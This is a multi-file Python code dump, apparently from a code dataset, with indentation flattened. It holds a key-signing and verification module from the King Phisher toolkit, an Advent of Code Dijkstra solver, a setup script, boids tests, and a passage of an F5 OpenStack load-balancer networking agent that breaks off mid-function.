self.assertIn('does not appear to a valid', flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/security_keys.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import binascii
import copy
import hashlib
import json
import logging
from king_phisher import find
from king_phisher import serializers
from king_phisher import utilities
import cryptography.hazmat.primitives.ciphers
import cryptography.hazmat.primitives.ciphers.algorithms
import cryptography.hazmat.primitives.ciphers.modes
import cryptography.hazmat.primitives.padding as padding
import cryptography.hazmat.backends as backends
import ecdsa
import ecdsa.curves
import ecdsa.keys
ciphers = cryptography.hazmat.primitives.ciphers
ecdsa_curves = dict((c.name, c) for c in ecdsa.curves.curves)
"""
A dictionary of :py:class:`ecdsa.curves.Curve` objects keyed by their
:py:mod:`ecdsa` and OpenSSL compatible names.
"""
ecdsa_curves.update((c.openssl_name, c) for c in ecdsa.curves.curves)
def _decode_data(value, encoding=None):
if isinstance(encoding, str):
encoding = encoding.lower()
if encoding == 'base64':
value = binascii.a2b_base64(value)
elif encoding == 'hex':
value = binascii.a2b_hex(value)
elif encoding is not None:
raise ValueError('unknown encoding: ' + encoding)
return value
def _encoding_data(value, encoding=None):
if isinstance(encoding, str):
encoding = encoding.lower()
if encoding == 'base64':
value = binascii.b2a_base64(value).decode('utf-8').strip()
elif encoding == 'hex':
value = binascii.b2a_hex(value).decode('utf-8').strip()
elif encoding is not None:
raise ValueError('unknown encoding: ' + encoding)
return value
def _key_cls_from_dict(cls, value, encoding=None):
key_data = _decode_data(value['data'], encoding=encoding)
return cls.from_string(key_data, curve=value['type'])
def _kwarg_curve(kwargs):
if 'curve' not in kwargs:
return kwargs
curve = kwargs.pop('curve')
if isinstance(curve, str):
if curve not in ecdsa_curves:
raise ValueError('unknown curve: ' + curve)
curve = ecdsa_curves[curve]
elif not isinstance(curve, ecdsa.curves.Curve):
raise TypeError('curve must either be a curve name or ecdsa.curves.Curve instance')
kwargs['curve'] = curve
return kwargs
def openssl_decrypt_data(ciphertext, password, digest='sha256', encoding='utf-8'):
"""
Decrypt *ciphertext* in the same way as OpenSSL. For the meaning of
*digest* see the :py:func:`.openssl_derive_key_and_iv` function
documentation.
.. note::
This function can be used to decrypt ciphertext created with the
``openssl`` command line utility.
.. code-block:: none
openssl enc -e -aes-256-cbc -in file -out file.enc -md sha256
:param bytes ciphertext: The encrypted data to decrypt.
:param str password: The password to use when deriving the decryption key.
:param str digest: The name of hashing function to use to generate the key.
:param str encoding: The name of the encoding to use for the password.
:return: The decrypted data.
:rtype: bytes
"""
salt = b''
if ciphertext[:8] == b'Salted__':
salt = ciphertext[8:16]
ciphertext = ciphertext[16:]
my_key, my_iv = openssl_derive_key_and_iv(password, salt, 32, 16, digest=digest, encoding=encoding)
cipher = ciphers.Cipher(
ciphers.algorithms.AES(my_key),
ciphers.modes.CBC(my_iv),
backend=backends.default_backend()
)
decryptor = cipher.decryptor()
plaintext = decryptor.update(ciphertext) + decryptor.finalize()
unpadder = padding.PKCS7(cipher.algorithm.block_size).unpadder()
return unpadder.update(plaintext) + unpadder.finalize()
def openssl_derive_key_and_iv(password, salt, key_length, iv_length, digest='sha256', encoding='utf-8'):
"""
Derive an encryption key and initialization vector (IV) in the same way as
OpenSSL.
.. note::
Different versions of OpenSSL use a different default value for the
*digest* function used to derive keys and initialization vectors. A
specific one can be used by passing the ``-md`` option to the
``openssl`` command.
:param str password: The password to use when deriving the key and IV.
:param bytes salt: A value to use as a salt for the operation.
:param int key_length: The length in bytes of the key to return.
:param int iv_length: The length in bytes of the IV to return.
:param str digest: The name of hashing function to use to generate the key.
:param str encoding: The name of the encoding to use for the password.
:return: The key and IV as a tuple.
:rtype: tuple
"""
password = password.encode(encoding)
digest_function = getattr(hashlib, digest)
chunk = b''
data = b''
while len(data) < key_length + iv_length:
chunk = digest_function(chunk + password + salt).digest()
data += chunk
return data[:key_length], data[key_length:key_length + iv_length]
class SigningKey(ecdsa.SigningKey, object):
@classmethod
def from_secret_exponent(cls, *args, **kwargs):
instance = super(SigningKey, cls).from_secret_exponent(*args, **kwargs)
orig_vk = instance.verifying_key
instance.verifying_key = VerifyingKey.from_public_point(orig_vk.pubkey.point, instance.curve, instance.default_hashfunc)
return instance
@classmethod
def from_string(cls, string, **kwargs):
kwargs = _kwarg_curve(kwargs)
return super(SigningKey, cls).from_string(string, **kwargs)
@classmethod
def from_dict(cls, value, encoding='base64'):
"""
Load the signing key from the specified dict object.
:param dict value: The dictionary to load the key data from.
:param str encoding: The encoding of the required 'data' key.
:return: The new signing key.
:rtype: :py:class:`.SigningKey`
"""
return _key_cls_from_dict(cls, value, encoding=encoding)
@classmethod
def from_file(cls, file_path, password=None, encoding='utf-8'):
"""
Load the signing key from the specified file. If *password* is
specified, the file is assumed to have been encoded using OpenSSL using
``aes-256-cbc`` with ``sha256`` as the message digest.
:param str file_path: The path to the file to load.
:param str password: An optional password to use for decrypting the file.
:param str encoding: The encoding of the data.
:return: A tuple of the key's ID, and the new :py:class:`.SigningKey` instance.
:rtype: tuple
"""
with open(file_path, 'rb') as file_h:
file_data = file_h.read()
if password:
file_data = openssl_decrypt_data(file_data, password, encoding=encoding)
file_data = file_data.decode(encoding)
file_data = serializers.JSON.loads(file_data)
utilities.validate_json_schema(file_data, 'king-phisher.security.key')
return file_data['id'], cls.from_dict(file_data['signing-key'], encoding=file_data.pop('encoding', 'base64'))
def sign_dict(self, data, signature_encoding='base64'):
"""
Sign a dictionary object. The dictionary will have a 'signature' key
added is required by the :py:meth:`.VerifyingKey.verify_dict` method.
To serialize the dictionary to data suitable for the operation the
:py:func:`json.dumps` function is used and the resulting data is then
UTF-8 encoded.
:param dict data: The dictionary of data to sign.
:param str signature_encoding: The encoding name of the signature data.
:return: The dictionary object is returned with the 'signature' key added.
"""
utilities.assert_arg_type(data, dict, arg_pos=1)
data = copy.copy(data)
data.pop('signature', None) # remove a pre-existing signature
json_data = json.dumps(data, sort_keys=True).encode('utf-8')
data['signature'] = _encoding_data(self.sign(json_data), encoding=signature_encoding)
return data
class VerifyingKey(ecdsa.VerifyingKey, object):
@classmethod
def from_string(cls, string, **kwargs):
kwargs = _kwarg_curve(kwargs)
return super(VerifyingKey, cls).from_string(string, **kwargs)
@classmethod
def from_dict(cls, value, encoding='base64'):
return _key_cls_from_dict(cls, value, encoding=encoding)
def verify_dict(self, data, signature_encoding='base64'):
"""
Verify a signed dictionary object. The dictionary must have a
'signature' key as added by the :py:meth:`.SigningKey.sign_dict`
method. To serialize the dictionary to data suitable for the operation
the :py:func:`json.dumps` function is used and the resulting data is
then UTF-8 encoded.
:param dict data: The dictionary of data to verify.
:param str signature_encoding: The encoding name of the signature data.
"""
utilities.assert_arg_type(data, dict, arg_pos=1)
data = copy.copy(data)
signature = _decode_data(data.pop('signature'), encoding=signature_encoding)
data = json.dumps(data, sort_keys=True).encode('utf-8')
return self.verify(signature, data)
class SecurityKeys(object):
"""
The security keys that are installed on the system. These are then used to
validate the signatures of downloaded files to ensure they have not been
corrupted or tampered with.
.. note::
Keys are first loaded from the security.json file included with the
application source code and then from an optional security.local.json
file. Keys loaded from the optional file can not over write keys loaded
from the system file.
"""
logger = logging.getLogger('KingPhisher.SecurityKeys')
def __init__(self):
self.keys = utilities.FreezableDict()
"""The dictionary of the loaded security keys, keyed by their identity string."""
if not self._load_key_store('security.json'):
raise RuntimeError('failed to load any keys from the primary store')
self._load_key_store('security.local.json')
self.keys.freeze()
self.logger.info("security key store initialized with {0:,} keys".format(len(self.keys)))
def _get_verifying_key(self, key_id):
key = self.keys.get(key_id)
if key is None:
self.logger.warning("verification of data with key {0} failed (unknown key)".format(key_id))
raise ecdsa.keys.BadSignatureError('unknown key for signature')
verifying_key = key.get('verifying-key')
if verifying_key is None:
self.logger.warning("verification of data with key {0} failed (missing verifying-key)".format(key_id))
raise ecdsa.keys.BadSignatureError('unknown key for signature')
return verifying_key
def _load_key_store(self, file_name):
file_path = find.data_file(file_name)
if not file_path:
return 0
with open(file_path, 'r') as file_h:
key_store = serializers.JSON.load(file_h)
utilities.validate_json_schema(key_store, 'king-phisher.security')
key_store = key_store['keys']
loaded = 0
for key_idx, key in enumerate(key_store, 1):
identifier = key['id']
if identifier in self.keys:
self.logger.warning("skipping loading {0}:{1} due to a duplicate id".format(file_name, key_idx))
continue
verifying_key = key['verifying-key']
key['verifying-key'] = VerifyingKey.from_dict(verifying_key, encoding=verifying_key.pop('encoding', 'base64'))
self.keys[identifier] = key
self.logger.debug("loaded key id: {0} from: {1}".format(identifier, file_path))
loaded += 1
return loaded
def verify(self, key_id, data, signature):
"""
Verify the data with the specified signature as signed by the specified
key. This function will raise an exception if the verification fails
for any reason, including if the key can not be found.
:param str key_id: The key's identifier.
:param bytes data: The data to verify against the signature.
:param bytes signature: The signature of the data to verify.
"""
verifying_key = self._get_verifying_key(key_id)
return verifying_key.verify(signature, data)
def verify_dict(self, data, signature_encoding='base64'):
"""
Verify the signed dictionary, using the key specified within the
'signed-by' key. This function will raise an exception if the
verification fails for any reason, including if the key can not be
found.
:param str key_id: The key's identifier.
:param bytes data: The data to verify against the signature.
:param bytes signature: The signature of the data to verify.
"""
key_id = data['signed-by']
verifying_key = self._get_verifying_key(key_id)
return verifying_key.verify_dict(data, signature_encoding=signature_encoding)
|
python
|
import sys
nodes = []
class node:
value = -1
visited = False
dist = 2e30
prev = None
idx = -1
neighbors = []
def __init__(self, v):
self.value = v
def getNeighbors(x,y,input):
result = []
if y>1:
result.append(input[y-1][x])
if y+1<len(input):
result.append(input[y+1][x])
if x>1:
result.append(input[y][x-1])
if x+1<len(input[y]):
result.append(input[y][x+1])
return result
def loadFile(part2 = False):
f = open("Day15\\Input.txt", "r")
nodes.clear()
for x in f:
x = x.strip()
row = []
for y in x:
row.append(node(int(y)))
if part2:
wid = len(row)
for i in range(1,5):
for j in range(wid):
v = row[j].value+i
if v > 9:
v-=9
row.append(node(v))
nodes.append(row)
if part2:
hei = len(nodes)
for i in range(1,5):
for j in range(hei):
row = []
for n in nodes[j]:
v = n.value+i
if v > 9:
v-=9
row.append(node(v))
nodes.append(row)
for y in range(len(nodes)):
for x in range(len(nodes[y])):
nodes[y][x].neighbors = getNeighbors(x,y,nodes)
class priorityQueue:
queue = []
def updateNode(self,node):
idx = node.idx
if(idx <1):
return
while( idx>0 and self[idx].dist<self[idx-1].dist):
temp = self[idx]
self[idx] = self[idx-1]
self[idx-1] = temp
self[idx-1].idx = idx-1
self[idx].idx = idx
idx -= 1
def __getitem__(self,key):
return self.queue[key]
def __setitem__(self,key,value):
self.queue[key] = value
def popfront(self):
result = self[0]
for i in range(1,len(self.queue)):
self[i].idx -= 1
self[i-1] = self[i]
self.queue.pop()
result.idx = -1
return result
def addNode(self, node):
node.idx = len(self.queue)
self.queue.append(node)
def Dijkstra():
Q = priorityQueue()
source = 0
for y in range(len(nodes)):
for x in range(len(nodes[y])):
Q.addNode(nodes[y][x])
target = Q.queue[-1]
Q.queue[0].dist = 0
curr = 0
unvisted = len(Q.queue)
while len(Q.queue)>0:
u = Q.popfront()
if u == target:
break
unvisted -= 1
for n in u.neighbors:
d2 = u.dist+n.value
if d2 < n.dist:
n.dist = d2
n.prev = u
Q.updateNode(n)
return target.dist
def part1():
loadFile()
risk = Dijkstra()
print( f"Part 1: Risk:{risk}")
def part2():
loadFile(True)
risk = Dijkstra()
print( f"Part 2: Risk:{risk}")
part1()
#part2()
|
python
|
#!/usr/bin/env python
from distutils.core import setup
setup(name='Ignition',
version='0.1.8',
description='Run multiple programs in a specific order and monitor their state',
author='Luka Cehovin',
author_email='[email protected]',
url='https://github.com/lukacu/ignition/',
packages=['ignition'],
scripts=["bin/ignite"],
requires=[],
)
|
python
|
from ..class_boids import Boids
import numpy as np
from nose.tools import assert_equal,assert_almost_equal
import os
import yaml
def init_trial_boids():
pathtofile = 'fixtures/regression_fixtures.yml'
data=yaml.load(open(
os.path.join(os.path.dirname(__file__),pathtofile)))
pos_start = [data['before'][0],data['before'][1]]
vel_start = [data['before'][2],data['before'][3]]
test_boids = Boids(pos_start,vel_start)
return test_boids
def check_func(test_boids,pathtofile):
test_boids.increment_positions()
answer=yaml.load(open(
os.path.join(os.path.dirname(__file__),pathtofile)))
# assert_almost_equal cannot evaluate arrays
# therefore we iterate through all elements
for j in range(test_boids.Nboids):
for i in range(2):
assert_almost_equal(test_boids.positions[i][j],
answer['positions'][i][j],delta=0.01)
assert_almost_equal(test_boids.velocities[i][j],
answer['velocities'][i][j],delta=0.01)
def test_fly_towards_middle():
test_boids = init_trial_boids()
test_boids.fly_towards_middle(0.01)
check_func(test_boids,'fixtures/fly_towards_middle.yml')
def test_avoid_nearby_boids():
test_boids = init_trial_boids()
test_boids.avoid_nearby_boids(100)
check_func(test_boids,'fixtures/avoid_nearby_birds.yml')
def test_match_speeds():
test_boids = init_trial_boids()
test_boids.match_speeds(0.125,1000)
check_func(test_boids,'fixtures/match_speeds.yml')
|
python
|
# Copyright (c) 2014-2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import netaddr
from requests import HTTPError
from oslo_log import log as logging
from f5_openstack_agent.lbaasv2.drivers.bigip import constants_v2
from f5_openstack_agent.lbaasv2.drivers.bigip import exceptions as f5_ex
from f5_openstack_agent.lbaasv2.drivers.bigip.l2_service import \
L2ServiceBuilder
from f5_openstack_agent.lbaasv2.drivers.bigip.network_helper import \
NetworkHelper
from f5_openstack_agent.lbaasv2.drivers.bigip import resource_helper
from f5_openstack_agent.lbaasv2.drivers.bigip.selfips import BigipSelfIpManager
from f5_openstack_agent.lbaasv2.drivers.bigip.snats import BigipSnatManager
from f5_openstack_agent.lbaasv2.drivers.bigip.utils import strip_domain_address
LOG = logging.getLogger(__name__)
class NetworkServiceBuilder(object):
def __init__(self, f5_global_routed_mode, conf, driver, l3_binding=None):
self.f5_global_routed_mode = f5_global_routed_mode
self.conf = conf
self.driver = driver
self.l3_binding = l3_binding
self.l2_service = L2ServiceBuilder(driver, f5_global_routed_mode)
self.bigip_selfip_manager = BigipSelfIpManager(
self.driver, self.l2_service, self.driver.l3_binding)
self.bigip_snat_manager = BigipSnatManager(
self.driver, self.l2_service, self.driver.l3_binding)
self.vlan_manager = resource_helper.BigIPResourceHelper(
resource_helper.ResourceType.vlan)
self.rds_cache = {}
self.interface_mapping = self.l2_service.interface_mapping
self.network_helper = NetworkHelper(conf=self.conf)
self.service_adapter = self.driver.service_adapter
def post_init(self):
# Run and Post Initialization Tasks
# run any post initialized tasks, now that the agent
# is fully connected
self.l2_service.post_init()
def tunnel_sync(self, tunnel_ips):
self.l2_service.tunnel_sync(tunnel_ips)
def set_tunnel_rpc(self, tunnel_rpc):
# Provide FDB Connector with ML2 RPC access
self.l2_service.set_tunnel_rpc(tunnel_rpc)
def set_l2pop_rpc(self, l2pop_rpc):
# Provide FDB Connector with ML2 RPC access
self.l2_service.set_l2pop_rpc(l2pop_rpc)
def initialize_vcmp(self):
self.l2_service.initialize_vcmp_manager()
def initialize_tunneling(self, bigip):
# setup tunneling
vtep_folder = self.conf.f5_vtep_folder
vtep_selfip_name = self.conf.f5_vtep_selfip_name
bigip.local_ip = None
if not vtep_folder or vtep_folder.lower() == 'none':
vtep_folder = 'Common'
if vtep_selfip_name and \
not vtep_selfip_name.lower() == 'none':
# profiles may already exist
# create vxlan_multipoint_profile`
self.network_helper.create_vxlan_multipoint_profile(
bigip,
'vxlan_ovs',
partition='Common')
# create l2gre_multipoint_profile
self.network_helper.create_l2gre_multipoint_profile(
bigip,
'gre_ovs',
partition='Common')
# find the IP address for the selfip for each box
local_ip = self.bigip_selfip_manager.get_selfip_addr(
bigip,
vtep_selfip_name,
partition=vtep_folder
)
if local_ip:
bigip.local_ip = local_ip
else:
raise f5_ex.MissingVTEPAddress(
'device %s missing vtep selfip %s'
% (bigip.device_name,
'/' + vtep_folder + '/' +
vtep_selfip_name))
def assure_opflex_network_port(self, network_id, network):
port = None
port_name = "bigip-opflex-{}".format(network_id)
port = self.driver.plugin_rpc.create_port_on_network(
network_id=network_id,
name=port_name)
return port
def is_service_connected(self, service):
networks = service.get('networks', {})
supported_net_types = ['vlan', 'vxlan', 'gre', 'opflex']
for (network_id, network) in networks.iteritems():
if network_id in self.conf.common_network_ids:
continue
network_type = \
network.get('provider:network_type', "")
if network_type == "flat":
continue
segmentation_id = \
network.get('provider:segmentation_id', None)
if not segmentation_id:
if network_type in supported_net_types and \
self.conf.f5_network_segment_physical_network:
if network_type == "opflex":
# This is called only when the HPB config item
# f5_network_segment_physical_network is set.
self.assure_opflex_network_port(network_id, network)
return False
LOG.error("Misconfiguration: Segmentation ID is "
"missing from the service definition. "
"Please check the setting for "
"f5_network_segment_physical_network in "
"f5-openstack-agent.ini in case neutron "
"is operating in Hierarchical Port Binding "
"mode.")
raise f5_ex.InvalidNetworkDefinition(
"Network segment ID %s not defined" % network_id)
return True
def prep_service_networking(self, service, traffic_group):
"""Assure network connectivity is established on all bigips."""
if self.conf.f5_global_routed_mode:
return
if not self.is_service_connected(service):
raise f5_ex.NetworkNotReady(
"Network segment(s) definition incomplete")
if self.conf.use_namespaces:
try:
LOG.debug("Annotating the service definition networks "
"with route domain ID.")
self._annotate_service_route_domains(service)
except f5_ex.InvalidNetworkType as exc:
LOG.warning(exc.message)
except Exception as err:
LOG.exception(err)
raise f5_ex.RouteDomainCreationException(
"Route domain annotation error")
# Per Device Network Connectivity (VLANs or Tunnels)
subnetsinfo = self._get_subnets_to_assure(service)
for (assure_bigip, subnetinfo) in (
itertools.product(self.driver.get_all_bigips(), subnetsinfo)):
LOG.debug("Assuring per device network connectivity "
"for %s on subnet %s." % (assure_bigip.hostname,
subnetinfo['subnet']))
# Make sure the L2 network is established
self.l2_service.assure_bigip_network(
assure_bigip, subnetinfo['network'])
# Connect the BigIP device to network, by getting
# a self-ip address on the subnet.
self.bigip_selfip_manager.assure_bigip_selfip(
assure_bigip, service, subnetinfo)
# L3 Shared Config
assure_bigips = self.driver.get_config_bigips()
LOG.debug("Getting subnetinfo for ...")
LOG.debug(assure_bigips)
for subnetinfo in subnetsinfo:
if self.conf.f5_snat_addresses_per_subnet > 0:
self._assure_subnet_snats(assure_bigips, service, subnetinfo)
if subnetinfo['is_for_member'] and not self.conf.f5_snat_mode:
try:
self._allocate_gw_addr(subnetinfo)
except KeyError as err:
raise f5_ex.VirtualServerCreationException(err.message)
for assure_bigip in assure_bigips:
# If we are not using SNATS, attempt to become
# the subnet's default gateway.
self.bigip_selfip_manager.assure_gateway_on_subnet(
assure_bigip, subnetinfo, traffic_group)
def _annotate_service_route_domains(self, service):
# Add route domain notation to pool member and vip addresses.
tenant_id = service['loadbalancer']['tenant_id']
self.update_rds_cache(tenant_id)
if 'members' in service:
for member in service.get('members', []):
if 'address' in member:
LOG.debug("processing member %s" % member['address'])
if 'network_id' in member and member['network_id']:
member_network = (
self.service_adapter.get_network_from_service(
service,
member['network_id']
))
member_subnet = (
self.service_adapter.get_subnet_from_service(
service,
member['subnet_id']
))
if member_network:
self.assign_route_domain(
tenant_id, member_network, member_subnet)
rd_id = (
'%' + str(member_network['route_domain_id'])
)
member['address'] += rd_id
else:
member['address'] += '%0'
if 'vip_address' in service['loadbalancer']:
loadbalancer = service['loadbalancer']
if 'network_id' in loadbalancer:
lb_network = self.service_adapter.get_network_from_service(
service, loadbalancer['network_id'])
vip_subnet = self.service_adapter.get_subnet_from_service(
service, loadbalancer['vip_subnet_id'])
self.assign_route_domain(
tenant_id, lb_network, vip_subnet)
rd_id = '%' + str(lb_network['route_domain_id'])
service['loadbalancer']['vip_address'] += rd_id
else:
service['loadbalancer']['vip_address'] += '%0'
def is_common_network(self, network):
return self.l2_service.is_common_network(network)
def find_subnet_route_domain(self, tenant_id, subnet_id):
rd_id = 0
bigip = self.driver.get_bigip()
partition_id = self.service_adapter.get_folder_name(
tenant_id)
try:
tenant_rd = self.network_helper.get_route_domain(
bigip, partition=partition_id)
rd_id = tenant_rd.id
except HTTPError as error:
LOG.error(error)
return rd_id
def assign_route_domain(self, tenant_id, network, subnet):
# Assign route domain for a network
if self.l2_service.is_common_network(network):
network['route_domain_id'] = 0
return
LOG.debug("Assign route domain get from cache %s" % network)
try:
route_domain_id = self.get_route_domain_from_cache(network)
network['route_domain_id'] = route_domain_id
return
except f5_ex.RouteDomainCacheMiss as exc:
LOG.debug(exc.message)
LOG.debug("max namespaces: %s" % self.conf.max_namespaces_per_tenant)
LOG.debug("max namespaces == 1: %s" %
(self.conf.max_namespaces_per_tenant == 1))
if self.conf.max_namespaces_per_tenant == 1:
bigip = self.driver.get_bigip()
LOG.debug("bigip before get_domain: %s" % bigip)
partition_id = self.service_adapter.get_folder_name(
tenant_id)
tenant_rd = self.network_helper.get_route_domain(
bigip, partition=partition_id)
network['route_domain_id'] = tenant_rd.id
return
LOG.debug("assign route domain checking for available route domain")
check_cidr = netaddr.IPNetwork(subnet['cidr'])
placed_route_domain_id = None
for route_domain_id in self.rds_cache[tenant_id]:
LOG.debug("checking rd %s" % route_domain_id)
rd_entry = self.rds_cache[tenant_id][route_domain_id]
overlapping_subnet = None
for net_shortname in rd_entry:
LOG.debug("checking net %s" % net_shortname)
net_entry = rd_entry[net_shortname]
for exist_subnet_id in net_entry['subnets']:
if exist_subnet_id == subnet['id']:
continue
exist_subnet = net_entry['subnets'][exist_subnet_id]
exist_cidr = exist_subnet['cidr']
if check_cidr in exist_cidr or exist_cidr in check_cidr:
overlapping_subnet = exist_subnet
LOG.debug('rd %s: overlaps with subnet %s id: %s' % (
(route_domain_id, exist_subnet, exist_subnet_id)))
break
if overlapping_subnet:
# no need to keep looking
break
if not overlapping_subnet:
placed_route_domain_id = route_domain_id
break
if placed_route_domain_id is None:
if (len(self.rds_cache[tenant_id]) <
self.conf.max_namespaces_per_tenant):
placed_route_domain_id = self._create_aux_rd(tenant_id)
self.rds_cache[tenant_id][placed_route_domain_id] = {}
LOG.debug("Tenant %s now has %d route domains" %
(tenant_id, len(self.rds_cache[tenant_id])))
else:
raise Exception("Cannot allocate route domain")
LOG.debug("Placed in route domain %s" % placed_route_domain_id)
rd_entry = self.rds_cache[tenant_id][placed_route_domain_id]
net_short_name = self.get_neutron_net_short_name(network)
if net_short_name not in rd_entry:
rd_entry[net_short_name] = {'subnets': {}}
net_subnets = rd_entry[net_short_name]['subnets']
net_subnets[subnet['id']] = {'cidr': check_cidr}
network['route_domain_id'] = placed_route_domain_id
def _create_aux_rd(self, tenant_id):
# Create a new route domain
route_domain_id = None
bigips = self.driver.get_all_bigips()
rd_id = self.network_helper.get_next_domain_id(bigips)
for bigip in bigips:
partition_id = self.service_adapter.get_folder_name(tenant_id)
bigip_route_domain_id = self.network_helper.create_route_domain(
bigip,
rd_id,
partition=partition_id,
strictness=self.conf.f5_route_domain_strictness,
is_aux=True)
if route_domain_id is None:
route_domain_id = bigip_route_domain_id.id
elif bigip_route_domain_id.id != route_domain_id:
# FixME error
LOG.debug(
"Bigips allocated two different route domains!: %s %s"
% (bigip_route_domain_id, route_domain_id))
LOG.debug("Allocated route domain %s for tenant %s"
% (route_domain_id, tenant_id))
return route_domain_id
# The purpose of the route domain subnet cache is to
# determine whether there is an existing bigip
# subnet that conflicts with a new one being
# assigned to the route domain.
"""
# route domain subnet cache
rds_cache =
{'<tenant_id>': {
{'0': {
'<network type>-<segmentation id>': [
'subnets': [
'<subnet id>': {
'cidr': '<cidr>'
}
],
'1': {}}}}
"""
def update_rds_cache(self, tenant_id):
# Update the route domain cache from bigips
if tenant_id not in self.rds_cache:
LOG.debug("rds_cache: adding tenant %s" % tenant_id)
self.rds_cache[tenant_id] = {}
for bigip in self.driver.get_all_bigips():
self.update_rds_cache_bigip(tenant_id, bigip)
LOG.debug("rds_cache updated: " + str(self.rds_cache))
def update_rds_cache_bigip(self, tenant_id, bigip):
# Update the route domain cache for this tenant
# with information from bigip's vlan and tunnels
LOG.debug("rds_cache: processing bigip %s" % bigip.device_name)
route_domain_ids = self.network_helper.get_route_domain_ids(
bigip,
partition=self.service_adapter.get_folder_name(tenant_id))
# LOG.debug("rds_cache: got bigip route domains: %s" % route_domains)
for route_domain_id in route_domain_ids:
self.update_rds_cache_bigip_rd_vlans(
tenant_id, bigip, route_domain_id)
def update_rds_cache_bigip_rd_vlans(
self, tenant_id, bigip, route_domain_id):
# Update the route domain cache with information
# from the bigip vlans and tunnels from
# this route domain
LOG.debug("rds_cache: processing bigip %s rd %s"
% (bigip.device_name, route_domain_id))
# this gets tunnels too
partition_id = self.service_adapter.get_folder_name(tenant_id)
rd_vlans = self.network_helper.get_vlans_in_route_domain_by_id(
bigip,
partition=partition_id,
id=route_domain_id
)
LOG.debug("rds_cache: bigip %s rd %s vlans: %s"
% (bigip.device_name, route_domain_id, rd_vlans))
if len(rd_vlans) == 0:
LOG.debug("No vlans found for route domain: %d" %
(route_domain_id))
return
# make sure this rd has a cache entry
tenant_entry = self.rds_cache[tenant_id]
if route_domain_id not in tenant_entry:
tenant_entry[route_domain_id] = {}
# for every VLAN or TUNNEL on this bigip...
for rd_vlan in rd_vlans:
self.update_rds_cache_bigip_vlan(
tenant_id, bigip, route_domain_id, rd_vlan)
def update_rds_cache_bigip_vlan(
self, tenant_id, bigip, route_domain_id, rd_vlan):
# Update the route domain cache with information
# from the bigip vlan or tunnel
LOG.debug("rds_cache: processing bigip %s rd %d vlan %s"
% (bigip.device_name, route_domain_id, rd_vlan))
net_short_name = self.get_bigip_net_short_name(
bigip, tenant_id, rd_vlan)
# make sure this net has a cache entry
tenant_entry = self.rds_cache[tenant_id]
rd_entry = tenant_entry[route_domain_id]
if net_short_name not in rd_entry:
rd_entry[net_short_name] = {'subnets': {}}
net_subnets = rd_entry[net_short_name]['subnets']
partition_id = self.service_adapter.get_folder_name(tenant_id)
LOG.debug("Calling get_selfips with: partition %s and vlan_name %s",
partition_id, rd_vlan)
selfips = self.bigip_selfip_manager.get_selfips(
bigip,
partition=partition_id,
vlan_name=rd_vlan
)
LOG.debug("rds_cache: got selfips")
for selfip in selfips:
LOG.debug("rds_cache: processing bigip %s rd %s vlan %s self %s" %
(bigip.device_name, route_domain_id, rd_vlan,
selfip.name))
if bigip.device_name not in selfip.name:
LOG.error("rds_cache: Found unexpected selfip %s for tenant %s"
% (selfip.name, tenant_id))
continue
subnet_id = selfip.name.split(bigip.device_name + '-')[1]
# convert 10.1.1.1%1/24 to 10.1.1.1/24
(addr, netbits) = selfip.address.split('/')
addr = addr.split('%')[0]
selfip.address = addr + '/' + netbits
# selfip addresses will have slash notation: 10.1.1.1/24
netip = netaddr.IPNetwork(selfip.address)
LOG.debug("rds_cache: updating subnet %s with %s"
% (subnet_id, str(netip.cidr)))
net_subnets[subnet_id] = {'cidr': netip.cidr}
LOG.debug("rds_cache: now %s" % self.rds_cache)
def get_route_domain_from_cache(self, network):
# Get route domain from cache by network
net_short_name = self.get_neutron_net_short_name(network)
for tenant_id in self.rds_cache:
tenant_cache = self.rds_cache[tenant_id]
for route_domain_id in tenant_cache:
if net_short_name in tenant_cache[route_domain_id]:
return route_domain_id
# Not found
raise f5_ex.RouteDomainCacheMiss(
"No route domain cache entry for {0}".format(net_short_name))
def remove_from_rds_cache(self, network, subnet):
# Get route domain from cache by network
LOG.debug("remove_from_rds_cache")
net_short_name = self.get_neutron_net_short_name(network)
for tenant_id in self.rds_cache:
LOG.debug("rds_cache: processing remove for %s" % tenant_id)
deleted_rds = []
tenant_cache = self.rds_cache[tenant_id]
for route_domain_id in tenant_cache:
if net_short_name in tenant_cache[route_domain_id]:
net_entry = tenant_cache[route_domain_id][net_short_name]
if subnet['id'] in net_entry['subnets']:
del net_entry['subnets'][subnet['id']]
if len(net_entry['subnets']) == 0:
del net_entry['subnets']
if len(tenant_cache[route_domain_id][net_short_name]) == 0:
del tenant_cache[route_domain_id][net_short_name]
